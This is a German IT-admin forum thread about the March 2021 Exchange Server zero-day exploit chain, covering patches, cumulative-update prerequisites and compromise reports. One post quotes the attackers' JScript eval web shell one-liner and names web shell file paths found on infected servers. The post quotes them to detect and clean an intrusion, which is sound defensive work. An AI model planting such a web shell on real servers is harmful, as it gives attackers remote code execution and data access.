27
0-day Exploit Chain für Exchange Server - Patches verfügbar
Zur Info: Microsoft warnt vor einer Exploit-Chain, bei der vier 0-day-Schwachstellen für gezielte Angriffe auf Exchange per Outlook Web App kombiniert werden (eine chines. Hackergruppe wird dahinter vermutet). Administratoren von On-PremisesMicrosoft Exchange-Servern sollten dringen reagieren und die zum 2. März 2021 freigegebenen Updates installieren. Auch für Exchange Server 2010 gibt es noch ein Sicherheitsupdate.
Zusammenfassung: Exchange-Server 0-day-Exploits werden aktiv ausgenutzt, patchen!
Microsoft hat folgende Beiträge zum Thema veröffentlicht:
- HAFNIUM targeting Exchange Servers with 0-day exploits
- New nation-state cyberattacks
- Details gibts in folgendem Beitrag: Multiple Security Updates Released for Exchange Server
Zusammenfassung: Exchange-Server 0-day-Exploits werden aktiv ausgenutzt, patchen!
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 657826
Url: https://administrator.de/contentid/657826
Ausgedruckt am: 22.11.2024 um 20:11 Uhr
27 Kommentare
Neuester Kommentar
Danke, Patch wurde problemlos installiert. (Ex2016CU19)
1
Moin moin,
wird das Update nicht über das Windows Update feature verteilt?
Das CU19 ist von Dezember und enthält keinen Hinweis auf eine Aktualisierung.
"Cumulative Update 19 for Microsoft Exchange Server 2016 was released on December 15, 2020. This cumulative update includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later cumulative updates for Exchange Server 2016. This update also resolves vulnerabilities, see Microsoft Common Vulnerabilities and Exposures CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142, CVE-2020-17143.
This update also includes new daylight saving time (DST) updates for Exchange Server 2016. For more information about DST, see Daylight Saving Time Help and Support Center."
wird das Update nicht über das Windows Update feature verteilt?
Das CU19 ist von Dezember und enthält keinen Hinweis auf eine Aktualisierung.
"Cumulative Update 19 for Microsoft Exchange Server 2016 was released on December 15, 2020. This cumulative update includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later cumulative updates for Exchange Server 2016. This update also resolves vulnerabilities, see Microsoft Common Vulnerabilities and Exposures CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142, CVE-2020-17143.
This update also includes new daylight saving time (DST) updates for Exchange Server 2016. For more information about DST, see Daylight Saving Time Help and Support Center."
@Thomas2
Um KB5000871 installieren zu können brauchst du mindestens Ex2013 mit CU23, Ex2016 mit CU18/CU19 oder Ex2019 mit CU7/CU8.
https://www.frankysweb.de/exchange-server-neue-sicherheitsupdates-maerz- ...
Um KB5000871 installieren zu können brauchst du mindestens Ex2013 mit CU23, Ex2016 mit CU18/CU19 oder Ex2019 mit CU7/CU8.
https://www.frankysweb.de/exchange-server-neue-sicherheitsupdates-maerz- ...
1
Hi Spec1re,
wir haben CU17, wenn ich die Version abfrage. Dann installiere ich das CU19. Auch da nochmal für mich zum Verständnis: Wenn ich das System immer über Windows Update aktualisiere ist es trotzdem nicht aktuell?
Vielen Dank.
wir haben CU17, wenn ich die Version abfrage. Dann installiere ich das CU19. Auch da nochmal für mich zum Verständnis: Wenn ich das System immer über Windows Update aktualisiere ist es trotzdem nicht aktuell?
Vielen Dank.
Richtig, in diesem speziellen Fall dauert es etwas länger bis das Update über WU/WSUS erhältlich ist.
Für CU17 gibt es kein Patch, also musst du mindestens auf CU 18, besser gleich auf CU19 hoch gehen.
Gruß Spec.
Für CU17 gibt es kein Patch, also musst du mindestens auf CU 18, besser gleich auf CU19 hoch gehen.
Gruß Spec.
1
Servus,
Installation problemlos verlaufen, habe mich positiv gewundert, dass der Reboot der VM heute Vormittag nach diesem Update so schnell durch war.
Gruß
Installation problemlos verlaufen, habe mich positiv gewundert, dass der Reboot der VM heute Vormittag nach diesem Update so schnell durch war.
Gruß
Morning,
wir haben das Update von CU17 auf CU19 durchgeführt und den Sicherheitspatch installiert. Seitdem funktioniert bei uns im Outlook und im OWA die Suche nicht mehr.
Gruß,
Thomas
€: Nach einem Neuaufbau des Indexes geht die Suche auch wieder.
Frankys: Index neu erstellen
wir haben das Update von CU17 auf CU19 durchgeführt und den Sicherheitspatch installiert. Seitdem funktioniert bei uns im Outlook und im OWA die Suche nicht mehr.
Gruß,
Thomas
€: Nach einem Neuaufbau des Indexes geht die Suche auch wieder.
Frankys: Index neu erstellen
Hallo.
Exchange 2019 CU8
Ging, als ich die Hinweise bis gaaaaanz zum Schluss gelesen hatte, dann den Patch ausgeführt in einem Command Prompt, welches als Administrator gestartet wurde
EDIT: Backup wieder eingespielt. Es sah so aus, dass alles funktioniert, aber leider wollte der "Microsoft Filterwaltungsdienst" nicht mehr starten.
Keine Lösung gefunden. Also bleibt das System erst einmal ungepatcht. Werde weiter nach einer Lösung suchen
Gruß
Marc
Exchange 2019 CU8
Ging, als ich die Hinweise bis gaaaaanz zum Schluss gelesen hatte, dann den Patch ausgeführt in einem Command Prompt, welches als Administrator gestartet wurde
EDIT: Backup wieder eingespielt. Es sah so aus, dass alles funktioniert, aber leider wollte der "Microsoft Filterwaltungsdienst" nicht mehr starten.
Keine Lösung gefunden. Also bleibt das System erst einmal ungepatcht. Werde weiter nach einer Lösung suchen
Gruß
Marc
Moin,
kann jemand die Brisanz dieser Sicherheitslücken einschätzen, wenn vor dem Exchange eine Sophos UTM mit u.a. URL-Hardening und 2FA auf OWA vorhanden ist?
Gruß
bdmvg
kann jemand die Brisanz dieser Sicherheitslücken einschätzen, wenn vor dem Exchange eine Sophos UTM mit u.a. URL-Hardening und 2FA auf OWA vorhanden ist?
Gruß
bdmvg
Das Problem ist ja das die Auth komplett umgangen wird, keine Ahnung ob da 2FA was bringt. Kannst ja mal das Script von Microsoft auf dem Exchange laufen lassen, das sagt dir dann auch gleich was Sache ist.
https://github.com/microsoft/CSS-Exchange/tree/main/Security
Gruß Spec
https://github.com/microsoft/CSS-Exchange/tree/main/Security
Gruß Spec
1
Hi,
ich habe meine 2016er und 2019er direkt aktualisiert. Aktuellste CU und Patches liefen problemfrei durch.
Danach hatte ich nach den von Microsoft genannten ASPX-Dateien gesucht, aber manuell nichts entsprechendes gefunden.
Nun hat aber der Virenscanner zwei Dateien gefunden und direkt entfernt:
Die erste Datei wurde am 04.03. vom Echtzeit Dateischutz gelöscht. Die zweite wurde erst heute erkannt. Produkt im Einsatz ist "ESET-Mail-Security".
Einen aktiven Abgriff von Daten konnte ich bislang nicht feststellen.
Solch Mist wird wohl in den nächsten Jahren zum Standard werden.
ich habe meine 2016er und 2019er direkt aktualisiert. Aktuellste CU und Patches liefen problemfrei durch.
Danach hatte ich nach den von Microsoft genannten ASPX-Dateien gesucht, aber manuell nichts entsprechendes gefunden.
Nun hat aber der Virenscanner zwei Dateien gefunden und direkt entfernt:
- C:\inetpub\wwwroot\aspnet_client\discover.aspx (CVE-2021-26855.Webshell.A Trojaner)
- C:\inetpub\wwwroot\aspnet_client\OutlookEN.aspx (CVE-2021-26855.Webshell.B Trojaner)
Die erste Datei wurde am 04.03. vom Echtzeit Dateischutz gelöscht. Die zweite wurde erst heute erkannt. Produkt im Einsatz ist "ESET-Mail-Security".
Einen aktiven Abgriff von Daten konnte ich bislang nicht feststellen.
Solch Mist wird wohl in den nächsten Jahren zum Standard werden.
Danke!
Die Auth des EX mit Sicherheit, aber die der Firewall nicht.
Selbst wenn der EX alles durchlassen würde, muss die FW dennoch ihr OK geben.
Ich schau mir das Script mal an.
Gruß
bdmvg
Die Auth des EX mit Sicherheit, aber die der Firewall nicht.
Selbst wenn der EX alles durchlassen würde, muss die FW dennoch ihr OK geben.
Ich schau mir das Script mal an.
Gruß
bdmvg
Hier ein aktuelle Liste von Microsoft mit Tools und Scripten für den Exchange:
https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vul ...
Ich lasse gerade mal den MSERT durch laufen...
Gruß Spec
https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vul ...
Ich lasse gerade mal den MSERT durch laufen...
Gruß Spec
Hallo Ich habe den Microsoft Safety Scanner - 1.0.3001.0 durchlaufen lassen und folgende Meldung erhalten:
Exploit: ASP/CVE-2021-27065.B!dha Teilweise entfern, Neustart erforderlich.
Unter dem Pfad:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
Sehe ich die RedirSuiteServerProxa. aspx
wie kann ich diese auslesen um zu überprüfen ob da solche Informationen drin stehen?
http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
oder
http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.
HTTP Zugänge sind dicht.
Habe den Saftey Scanner nach Neustart nun nochmal durchlaufen lassen. Nichts mehr gefunden :/
Exploit: ASP/CVE-2021-27065.B!dha Teilweise entfern, Neustart erforderlich.
Unter dem Pfad:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
Sehe ich die RedirSuiteServerProxa. aspx
wie kann ich diese auslesen um zu überprüfen ob da solche Informationen drin stehen?
http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
oder
http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.
HTTP Zugänge sind dicht.
Habe den Saftey Scanner nach Neustart nun nochmal durchlaufen lassen. Nichts mehr gefunden :/
Zitat von @ingrimmsch:
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.
Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine
Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.
2Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine
Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.
Exchange Server - Buildnummern und Veröffentlichungstermine
Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
Moin @wieoderwas
Gruß,
Dani
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.Gruß,
Dani
Zitat von @Dani:
Moin @wieoderwas
Gruß,
Dani
Ich würde es wohl so vorgehen:Moin @wieoderwas
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.Gruß,
Dani
https://www.frankysweb.de/exchange-server-neuinstallation-ohne-datenverl ...
Uns hat es auch getroffen.
Basis ist hier ein W2012 R2 in Kombination mit Exchange 2016.
Es wird alles regelmäßig gepatched, aber das war nicht absehbar.
Die erste Attacke hatten wir in der Nacht zum 3.3.21.
Entdeckt wurde es heute. Ich kann nicht erkennen, ob es einen direkten Datenzugriff gab.
Wird ne lange Nacht...
Basis ist hier ein W2012 R2 in Kombination mit Exchange 2016.
Es wird alles regelmäßig gepatched, aber das war nicht absehbar.
Die erste Attacke hatten wir in der Nacht zum 3.3.21.
Entdeckt wurde es heute. Ich kann nicht erkennen, ob es einen direkten Datenzugriff gab.
Wird ne lange Nacht...
Die Europäische Bankenaufsicht ist Opfer der Exchange-Schwachstelle - ich berichtete im Blog.
https://www.borncity.com/blog/2021/03/08/cyber-angriff-auf-exchange-serv ...
Ich habe das Thema auch mal bei heise im News-Ticker veröffentlicht.
https://www.heise.de/news/Cyberangriff-auf-Exchange-Server-der-Europaeis ...
Da dürfte die Tage noch mehr kommen (bei ~170.000 potentiell betroffenen Systemen).
https://www.borncity.com/blog/2021/03/08/cyber-angriff-auf-exchange-serv ...
Ich habe das Thema auch mal bei heise im News-Ticker veröffentlicht.
https://www.heise.de/news/Cyberangriff-auf-Exchange-Server-der-Europaeis ...
Da dürfte die Tage noch mehr kommen (bei ~170.000 potentiell betroffenen Systemen).
Kollegen wisst Ihr, was ich noch nicht gestrahlt habe?
So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.
Was mich wundert:
Die Quellen berichten, dass die Angriffe aber erst seit etwa Januar laufen würden und dass natürlich nur Sicherheitsupdates für die aktuellsten CUs rauskommen.
Kann es also sein, dass mit den letzten CUs MS da nen Fehler eingebaut hat?
Ich habe seit längerem das Gefühl, dass die Qualität der MS-Updates wieder auf das NT4.0-Niveau gefallen ist:
Aber vielleicht irre ich mich ja auch.
Gruß
bdmvg
So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.
Was mich wundert:
Die Quellen berichten, dass die Angriffe aber erst seit etwa Januar laufen würden und dass natürlich nur Sicherheitsupdates für die aktuellsten CUs rauskommen.
Kann es also sein, dass mit den letzten CUs MS da nen Fehler eingebaut hat?
Ich habe seit längerem das Gefühl, dass die Qualität der MS-Updates wieder auf das NT4.0-Niveau gefallen ist:
- Installationen dauern ewig
- Update Chains sind wieder da
Aber vielleicht irre ich mich ja auch.
Gruß
bdmvg
Moin,
Gruß,
Dani
So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.
Exchange 2010 ist ebenfalls betroffen. Ist grundsätzlich seit 13.10.2020 EoS.Update Chains sind wieder da
Hast du ein aktuelles Beispiel? Für Exchange Server ab 2013 fällt mir keines ein. Aber vielleicht irre ich mich ja auch.
Ich habe schon überlegt, ob die Lücken aus dem Arsenal von FireEye durch den Solarwinds Hack stammen?!Gruß,
Dani
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.
Du kannst also vom Stand X z.b. CU11 nicht direkt aktualisieren sondern musst nen Zwischenstopp über CU14 machen.
Beim 2010er war das schöner gelöst.
Gruß
bdmvg
Du kannst also vom Stand X z.b. CU11 nicht direkt aktualisieren sondern musst nen Zwischenstopp über CU14 machen.
Beim 2010er war das schöner gelöst.
Gruß
bdmvg
Zitat von @beidermachtvongreyscull:
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.
Ja, aber du kannst mit etwas manuellem aufwand das auch Direkt machen, ohne diesen Zwischenstop...Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.
https://www.msxfaq.de/exchange/update/exchange_direktes_update.htm
Was mich wunderte, Windows Update hat mir den Patch nicht angezeigt, ich hab ihn Manuell nachschieben müssen. Unser 2013er mit CU23 hängt glücklicherweise aber nicht offen im Netz. (Eine Empfehlung eines ehemaligen MS Entwicklers)
Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...
Zitat von @themuck:
Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...
Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...
autodiscover.domain.suffix/owa/
Mehr brauchst du meistens nicht.
Moin,
Microsoft hat heute Nacht für weitere CU's das Sicherheitsupdate bereitgestellt.
Security Update For Exchange Server 2016 Cumulative Update 14 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 15 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 16 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 4 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 5 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 6 (KB5000871)
Details wie immer im KB-Artikel: https://support.microsoft.com/en-us/topic/description-of-the-security-up ...
Gruß,
Dani
Microsoft hat heute Nacht für weitere CU's das Sicherheitsupdate bereitgestellt.
Security Update For Exchange Server 2016 Cumulative Update 14 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 15 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 16 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 4 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 5 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 6 (KB5000871)
Details wie immer im KB-Artikel: https://support.microsoft.com/en-us/topic/description-of-the-security-up ...
Gruß,
Dani
Mal gespannt, ob noch einer für 2016 CU11 rauskommt.
